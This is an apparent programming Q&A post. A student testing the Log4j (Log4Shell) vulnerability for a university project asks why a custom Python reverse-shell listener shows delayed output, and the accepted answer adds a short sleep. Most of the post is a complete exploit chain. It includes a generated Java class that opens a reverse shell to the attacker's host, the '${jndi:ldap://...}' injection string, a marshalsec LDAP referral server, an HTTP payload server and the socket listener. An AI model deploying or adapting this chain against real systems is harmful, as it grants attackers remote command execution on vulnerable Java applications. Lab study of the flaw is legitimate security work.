# Python server does not show output correctly

Tags: python, java, python-3.x, log4j

for a university project I am testing the log4j vulnerability. To do this, I use a python server that connects to the java client by creating a reverse shell.
Everything works except the output to server which is not displayed correctly. Specifically, the server shows the output of two previous inputs and I'm not understanding why.
I'm new to python and java programming so I'm a little confused.

Initial project: https://github.com/KleekEthicalHacking/log4j-exploit
I made some changes and added a python socket to handle the reverse shell.

PS: with netcat it seems to work fine but command with some space non work (ex: `cd ..` not work)

For run this project i use kali linux (python server) and ubuntu (java webapp). This code does not yet manage clients with windows os

poc.py + exploit class:

```
import sys
import argparse
from colorama import Fore, init
import subprocess
import multiprocessing

from http.server import HTTPServer, SimpleHTTPRequestHandler

init(autoreset=True)


def listToString(s):
    str1 = ""
    try:
        for ele in s:
            str1 += ele
        return str1
    except Exception as ex:
        parser.print_help()
        sys.exit()


def payload(userip, webport, lport):
    genExploit = (
                     """
                import java.io.IOException;
                import java.io.InputStream;
                import java.io.OutputStream;
                import java.net.Socket;

                public class Exploit {

                    public Exploit() throws Exception {
                        String host="%s";
                        int port=%s;
                        //String cmd="/bin/sh";
                        String [] os_specs = GetOperatingSystem();
                        String os_name = os_specs[0].toString();
                        String cmd = os_specs[1].toString();
                        Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();
                        Socket s=new Socket(host,port);
                        InputStream pi=p.getInputStream(),pe=p.getErrorStream(),si=s.getInputStream();
                        OutputStream po=p.getOutputStream(),so=s.getOutputStream();
                        so.write(os_name.getBytes("UTF-8"));
                        while(!s.isClosed()) {
                            while(pi.available()>0)
                                so.write(pi.read());
                            while(pe.available()>0)
                                so.write(pe.read());
                            while(si.available()>0)
                                po.write(si.read());
                            so.flush();
                            po.flush();
                            Thread.sleep(50);
                            try {
                                p.exitValue();
                                break;
                            }
                            catch (Exception e){
                            }
                        };
                        p.destroy();
                        s.close();
                    }
                    
                    public String [] GetOperatingSystem() throws Exception {
                       String os = System.getProperty("os.name").toLowerCase();
                       String [] result = new String[3];
                       if (os.contains("win")) {
                           result[0] = "Windows";
                           result[1] = "cmd.exe";
                       }
                       else if (os.contains("nix") || os.contains("nux") || os.contains("aix")) {
                           result[0] = "Linux";
                           result[1] = "/bin/sh";
                       }
                       return result;
                    }
                }
                 """) % (userip, lport)

    # writing the exploit to Exploit.java file

    try:
        f = open("Exploit.java", "w")
        f.write(genExploit)
        f.close()
        print(Fore.GREEN + '[+] Exploit java class created success')

    except Exception as e:
        print(Fore.RED + f'[X] Something went wrong {e.toString()}')

    # checkJavaAvailible()
    # print(Fore.GREEN + '[+] Setting up LDAP server\n')

    # openshellforinjection(lport)
    checkJavaAvailible()

    print(Fore.GREEN + '[+] Setting up a new shell for RCE\n')
    p1 = multiprocessing.Process(target=open_shell_for_injection, args=(lport,))
    p1.start()

    print(Fore.GREEN + '[+] Setting up LDAP server\n')
    p2 = multiprocessing.Process(target=createLdapServer, args=(userip, webport))
    p2.start()

    # create the LDAP server on new thread
    # t1 = threading.Thread(target=createLdapServer, args=(userip, webport))
    # t1.start()
    # createLdapServer(userip, webport)

    # start the web server
    print(Fore.GREEN + f"[+] Starting the Web server on port {webport} http://0.0.0.0:{webport}\n")
    httpd = HTTPServer(('0.0.0.0', int(webport)), SimpleHTTPRequestHandler)
    httpd.serve_forever()


def checkJavaAvailible():
    javaver = subprocess.call(['./jdk1.8.0_20/bin/java', '-version'], stderr=subprocess.DEVNULL,
                              stdout=subprocess.DEVNULL)
    if javaver != 0:
        print(Fore.RED + '[X] Java is not installed inside the repository ')
        sys.exit()


def createLdapServer(userip, lport):
    sendme = "${jndi:ldap://%s:1389/a}" % userip
    print(Fore.GREEN + "[+] Send me: " + sendme + "\n")

    subprocess.run(["./jdk1.8.0_20/bin/javac", "Exploit.java"])

    url = "http://{}:{}/#Exploit".format(userip, lport)
    subprocess.run(["./jdk1.8.0_20/bin/java", "-cp",
                    "target/marshalsec-0.0.3-SNAPSHOT-all.jar", "marshalsec.jndi.LDAPRefServer", url])


def open_shell_for_injection(lport):
    terminal = subprocess.call(["qterminal", "-e", "python3 -i rce.py --lport " + lport])
    # terminal = subprocess.call(["qterminal", "-e", "nc -lvnp " + lport]) #netcat work


if __name__ == "__main__":

    try:
        parser = argparse.ArgumentParser(description='please enter the values ')

        parser.add_argument('--userip', metavar='userip', type=str,
                            nargs='+', help='Enter IP for LDAPRefServer & Shell')

        parser.add_argument('--webport', metavar='webport', type=str,
                            nargs='+', help='listener port for HTTP port')

        parser.add_argument('--lport', metavar='lport', type=str,
                            nargs='+', help='Netcat Port')

        args = parser.parse_args()

        payload(listToString(args.userip), listToString(args.webport), listToString(args.lport))

    except KeyboardInterrupt:
        print(Fore.RED + "\n[X] user interupted the program.")
        sys.exit(0)
```

rce.py:

```
import argparse
import socket
import sys

from colorama import Fore, init


def listToString(s):
    str1 = ""
    try:
        for ele in s:
            str1 += ele
        return str1
    except Exception as ex:
        parser.print_help()
        sys.exit()


def socket_for_rce(lport):
    print(Fore.GREEN + "[+] Setup Shell for RCE\n")
    SERVER_HOST = "0.0.0.0"
    SERVER_PORT = int(lport)
    BUFFER_SIZE = 8192
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    s.bind((SERVER_HOST, SERVER_PORT))
    s.listen(1)
    print(Fore.GREEN + f"Listening as {SERVER_HOST}:{SERVER_PORT}\n")
    client_socket, client_address = s.accept()
    print(
        Fore.GREEN + "(" + Fore.YELLOW + "REMOTE HOST" + Fore.GREEN + ") " + f"{client_address[0]}:{client_address[1]}"
                                                                             f" --> "
                                                                             f"Connected! (exit = close connection)\n")
    os_target = client_socket.recv(BUFFER_SIZE).decode()
    print("OS TARGET: " + Fore.YELLOW + os_target + "\n")
    if not os_target:
        print(Fore.RED + "[X] No OS detected\n")

    folderCommand = "pwd"
    folderCommand += "\n"
    client_socket.sendall(folderCommand.encode())
    path = client_socket.recv(BUFFER_SIZE).decode()
    print("path: " + path)
    if not path:
        print(Fore.RED + "[X] No work folder received\n")
    path_text = Fore.GREEN + "(" + Fore.YELLOW + "REMOTE" + Fore.GREEN + ") " + path

    while True:
        command = input(f"{path_text} > ")
        command += "\n"
        # if not command.strip():
        #    continue

        if command != "":
            if command == "exit":
                print(Fore.RED + "\n[X] Connection closed\n")
                client_socket.close()
                s.close()
                break

            else:
                client_socket.sendall(command.encode())
                data = client_socket.recv(BUFFER_SIZE).decode()
                print(data)
        else:
            pass


if __name__ == "__main__":

    try:
        parser = argparse.ArgumentParser(description='Instruction for usage: ')

        parser.add_argument('--lport', metavar='lport', type=str,
                            nargs='+', help='Rce Port')

        args = parser.parse_args()

        socket_for_rce(listToString(args.lport))

    except KeyboardInterrupt:
        print(Fore.RED + "\n[X] User interupted the program.")
        sys.exit(0)
```

Result:
[image: 1]

Comment: We cannot run your code since some critical parts are missing. First try to recreate the problem with as little code as possible and then post your run-able code.

Comment: @BillTheKid i added some info. Tell me if is ok

Answer (score 0, accepted):

Now works. I added `time.sleep(0.2)` after each sendall in rce.py